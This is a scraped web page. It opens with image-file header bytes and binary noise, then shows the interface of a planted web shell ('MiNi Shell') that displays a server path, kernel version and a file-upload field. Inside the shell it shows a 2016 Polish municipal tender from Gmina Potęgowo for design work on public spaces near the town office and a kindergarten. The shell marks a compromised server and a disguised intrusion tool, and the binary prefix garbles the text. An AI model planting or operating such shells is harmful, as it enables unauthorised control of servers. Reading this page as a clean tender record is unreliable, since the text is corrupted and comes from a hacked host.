JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160705/119607-N-2016.html

<p class="kh_header"><b>Potęgowo: wykonanie dokumentacji projektowej zadań:
1)Zagospodarowanie przestrzeni publicznej przy budynku Urzędu Gminy Potęgowo 
2)Zagospodarowanie przestrzeni publicznej przy Przedszkolu w Potęgowie</b><br>
<b>Numer ogłoszenia: 119607 - 2016; data zamieszczenia: 05.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Potęgowo , ul. Kościuszki 5, 76-230 Potęgowo, woj. pomorskie, tel. 059 8115072, faks 059 8115072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.potegowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie dokumentacji projektowej zadań:
1)Zagospodarowanie przestrzeni publicznej przy budynku Urzędu Gminy Potęgowo 
2)Zagospodarowanie przestrzeni publicznej przy Przedszkolu w Potęgowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej zadań:
Zadanie nr 1: Zagospodarowanie przestrzeni publicznej przy budynku Urzędu Gminy Potęgowo.
Przedmiotem zamówienia jest projekt zagospodarowania działek nr 665, 666, 667, 668, 669, 670, 671, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 682, 683, obr. Potęgowo położonej w Potęgowie przy ul. Kościuszki w gminie Potęgowo.
Opis nieruchomości:
Na działce 666 znajduje się dwupiętrowy budynek urzędu gminy oraz budynek gospodarczy - parterowy z poddaszem.
Zagospodarowanie przestrzeni publicznej polega na budowie placu rekreacyjnego z fontanną, placem zabaw dla dzieci oraz rabatami kwiatowymi. Ponadto w zakres opracowania wchodzi rozbiórka budynku gospodarczego, na miejsce którego planuje się budowę piętrowego budynku biurowo-gospodarczego. Wokół budynku urzędu gminy projektuje się 22 miejsca postojowe wraz z ciągami pieszo-jezdnymi. Projekt należy wykonać przy wykorzystaniu załączonej koncepcji zagospodarowania terenu wokół budynku Urzędu Gminy. 

W ramach projektu należy wykonać:
Zakres prac projektowych podzielony jest na dwa etapy:
ETAP I - zagospodarowanie przestrzeni publicznej wokół budynku Urzędu Gminy oraz rozbiórka budynku gospodarczego.
ETAP II - budowa budynku biurowo - gospodarczego

Dokumentację techniczną i projektowo-budowlaną (dla każdego etapu osobno) obejmującą: 
- opracowanie pełnobranżowego projektu budowlanego i  wykonawczego - po 5 egz. 
- sporządzenie przedmiarów robót każda branża osobno;
- sporządzenie kosztorysów inwestorskich każda branża osobno;
- sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
- sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych:
- uzyskanie warunków, opinii i uzgodnień (w tym: z właścicielami działek, UG Potęgowo, gestorami uzbrojenia sieciowego);
- uzyskanie wszelkich wymaganych decyzji i zezwoleń,
- dokumentację (pkt 1-5) należy dostarczyć także w wersji elektronicznej.
- Dokumentacja techniczna musi być kompletna do złożenia wniosku o pozwolenie na budowę lub zgłoszenie robót budowlanych bez sprzeciwu (dla każdego etapu osobno).
UWAGA!
W kosztach opracowania nie  uwzględniać opracowaną przez Zamawiającego - mapę do celów projektowych w skali 1 : 500 ( w trakcie wykonania);
Nadzór autorski - dotyczy całego zakresu przedsięwzięcia objętego zamówieniem w terminie wykonania inwestycji, w tym np. uzupełnienia i zmiany nieistotne w opracowanych projektach technicznych, 

Wykonanie cztery etapy:
Dokumentacja techniczna i projektowo-budowlana - zagospodarowanie przestrzeni publicznej wokół budynku Urzędu Gminy oraz rozbiórka budynku gospodarczego  (Etap I)  w  terminie 3 m-ce od zawarcia umowy,   
Dokumentacja techniczna i projektowo-budowlana -  budowa budynku biurowo - gospodarczego  (Etap II)  w  terminie 4 m-ce od zawarcia umowy,        
Nadzór autorski - dotyczy  całego zakresu przedsięwzięcia I Etapu  objętego zamówieniem  w terminie wykonania inwestycji. 
Nadzór autorski - dotyczy całego zakresu przedsięwzięcia II Etapu objętego zamówieniem  w terminie wykonania inwestycji. 


Zadanie nr 2 Zagospodarowanie przestrzeni publicznej przy Przedszkolu w Potęgowie:
Przedmiotem zamówienia jest projekt zagospodarowania działki nr 62/1, obręb Potęgowo położonej w Potęgowie przy ul. Głowackiego 5 w gminie Potęgowo.

Opis nieruchomości:
Działka nr 62/1 o powierzchni 2.636 m 2 zabudowana jest  budynkiem Przedszkola oraz placem zabaw. Projekt ma na celu zagospodarowanie przestrzeni publicznej placu przedszkolnego Przedszkola. 
Zagospodarowanie przestrzeni publicznej polega na budowie placu zabaw dla dzieci oraz zagospodarowanie terenu wokół budynku wraz z chodnikami i ścieżkami pieszymi oraz zakup niezbędnych materiałów i sprzętu do zagospodarowania terenu. W zakres wchodzi także zakup roślin, altany, ławeczek, elementów ozdobnych małej architektury  itp.
W ramach projektu należy wykonać:
Zakres prac projektowych podzielony jest na dwa etapy:
ETAP I - koncepcja zagospodarowania przestrzeni publicznej wokół budynku Przedszkola.
ETAPII - projekt zagospodarowania 
1)Dokumentacja techniczna i projektowo-budowlana obejmująca: 
- opracowanie pełnobranżowego projektu budowlano - wykonawczego -5 egz. 
- sporządzenie przedmiarów robót każda branża osobno;
- sporządzenie kosztorysów inwestorskich każda branża osobno;
- sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
- sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych:
- uzyskanie warunków, opinii i uzgodnień (w tym: z właścicielami działek, UG Potęgowo, gestorami uzbrojenia sieciowego);
- uzyskanie wszelkich wymaganych decyzji i zezwoleń,
- dokumentację (pkt 1-5) należy dostarczyć także w wersji elektronicznej.
- Dokumentacja techniczna musi być kompletna do złożenia wniosku o pozwolenie na budowę lub zgłoszenie robót budowlanych bez sprzeciwu.

2)Nadzór autorski - dotyczy całego zakresu przedsięwzięcia objętego zamówieniem w terminie wykonania inwestycji, w tym np. uzupełnienia i zmiany nieistotne w opracowanych projektach technicznych, 

Wykonanie trzy etapy:
Projekt zagospodarowania do zatwierdzenia -   w  terminie 3 tygodni od zawarcia umowy,   
Dokumentacja techniczna i projektowo-budowlana -  w  terminie 3 m-ce od zawarcia umowy,        
Nadzór autorski - dotyczy  całego zakresu przedsięwzięcia objętego zamówieniem  w terminie wykonania inwestycji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert  (a jeżeli okres prowadzenia działalności jest krótszy - z okresu prowadzenia działalności):
- co najmniej 1 usługi dotyczącej opracowania dokumentacji projektowej dla zadania polegającego na zagospodarowaniu przestrzeni publicznej (warunek dla zadania nr 2), 
-  co najmniej 1 usługi dotyczącej opracowania dokumentacji projektowej dla zadania polegającego na zagospodarowaniu przestrzeni publicznej wraz z zaprojektowaniem budynku użyteczności publicznej (warunek dla zadania nr 1);
W przypadku, gdy Wykonawca złoży ofertę na dwa zadania, warunek doświadczenia uzna się za spełniony, gdy wykaże się wykonaniem usługi określonej w warunku posiadania doświadczenia zawodowego dla zadania nr 1; 
na potwierdzenie: wykaz wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert usług zgodnie z pkt 8.2 SIWZ (załącznik nr 3) z załączeniem dowodów potwierdzających, że usługi te zostały wykonane należycie;
ocena metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem kadrowym, tj. min.:
- min. 1 osoba z odpowiednimi uprawnieniami do projektowania w specjalności konstrukcyjno - budowlanej (dla zadania nr 1);
- min. 1 osoba z odpowiednimi uprawnieniami do projektowania w specjalności architektonicznej (dla zadania nr 1 i zadania nr 2);
na potwierdzenie: wykaz osób (załącznik nr 4), którymi dysponuje Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia (zgodnie z pkt 8.3 SIWZ) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami oraz oświadczenie stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane przez Zamawiającego uprawnienia oraz o przynależności do właściwej izby samorządu zawodowego;
ocena metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy Pzp przewiduje możliwość zmian w postanowieniach umowy w następujących sytuacjach:
1) wystąpienia siły wyższej;
2) zmiany w obowiązujących przepisach;
3) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego;
4) zmiany zakresu zamówienia;
5) wydłużania się postępowań prowadzonych przez inne organy oraz innych okoliczności mogących mieć wpływ na dotrzymanie terminu realizacji przedmiotu zamowienia, z przyczyn niezależnych od Wykonawcy;
6) działań osób trzecich uniemożliwiających wykonanie usługi w terminie, które to działania nie są konsekwencją winy którejkolwiek ze stron;
7) decyzji Zamawiającego w sprawie zwiększenia lub zmniejszenia zakresu zamówienia;
8) zmiany stawki podatku od towarów i usług;
9) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;
10) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokość stawki składki na ubezpieczenia społeczne lub zdrowotne
Zmiany umowy mogą dotyczyć:
- sposobu i zakresu wykonania przedmiotu zamówienia;
- terminu wykonania;
- terminu zapłaty;
- wynagrodzenia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.potegowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Potęgowo, ul. Kościuszki 5, 76-230 Potęgowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2016 godzina 10:00, miejsce: sekretariat UG Potęgowo (pokój nr 14-15).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zagospodarowanie przestrzeni publicznej przy budynku Urzędu Gminy Potęgowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest projekt zagospodarowania działek nr 665, 666, 667, 668, 669, 670, 671, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 682, 683, obr. Potęgowo położonej w Potęgowie przy ul. Kościuszki w gminie Potęgowo.

Opis nieruchomości:
Na działce 666 znajduje się dwupiętrowy budynek urzędu gminy oraz budynek gospodarczy - parterowy z poddaszem.
Zagospodarowanie przestrzeni publicznej polega na budowie placu rekreacyjnego z fontanną, placem zabaw dla dzieci oraz rabatami kwiatowymi. Ponadto w zakres opracowania wchodzi rozbiórka budynku gospodarczego, na miejsce którego planuje się budowę piętrowego budynku biurowo-gospodarczego. Wokół budynku urzędu gminy projektuje się 22 miejsca postojowe wraz z ciągami pieszo-jezdnymi. Projekt należy wykonać przy wykorzystaniu załączonej koncepcji zagospodarowania terenu wokół budynku Urzędu Gminy. 

W ramach projektu należy wykonać:
Zakres prac projektowych podzielony jest na dwa etapy:
ETAP I - zagospodarowanie przestrzeni publicznej wokół budynku Urzędu Gminy oraz rozbiórka budynku gospodarczego.
ETAP II - budowa budynku biurowo - gospodarczego

Dokumentację techniczną i projektowo-budowlaną (dla każdego etapu osobno) obejmującą: 
- opracowanie pełnobranżowego projektu budowlanego i  wykonawczego - po 5 egz. 
- sporządzenie przedmiarów robót każda branża osobno;
- sporządzenie kosztorysów inwestorskich każda branża osobno;
- sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
- sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych:
- uzyskanie warunków, opinii i uzgodnień (w tym: z właścicielami działek, UG Potęgowo, gestorami uzbrojenia sieciowego);
- uzyskanie wszelkich wymaganych decyzji i zezwoleń,
- dokumentację (pkt 1-5) należy dostarczyć także w wersji elektronicznej.
- Dokumentacja techniczna musi być kompletna do złożenia wniosku o pozwolenie na budowę lub zgłoszenie robót budowlanych bez sprzeciwu (dla każdego etapu osobno).

UWAGA!
W kosztach opracowania nie  uwzględniać opracowaną przez Zamawiającego - mapę do celów projektowych w skali 1 : 500 ( w trakcie wykonania);

Nadzór autorski - dotyczy całego zakresu przedsięwzięcia objętego zamówieniem w terminie wykonania inwestycji, w tym np. uzupełnienia i zmiany nieistotne w opracowanych projektach technicznych,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94</li>
<li>2. termin wykonania I etapu - 4</li>
<li>3. termin wykonania II etapu - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zagospodarowanie przestrzeni publicznej przy Przedszkolu w Potęgowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest projekt zagospodarowania działki nr 62/1, obręb Potęgowo położonej w Potęgowie przy ul. Głowackiego 5 w gminie Potęgowo.
Opis nieruchomości:
Działka nr 62/1 o powierzchni 2.636 m 2 zabudowana jest  budynkiem Przedszkola oraz placem zabaw. Projekt ma na celu zagospodarowanie przestrzeni publicznej placu przedszkolnego Przedszkola. 
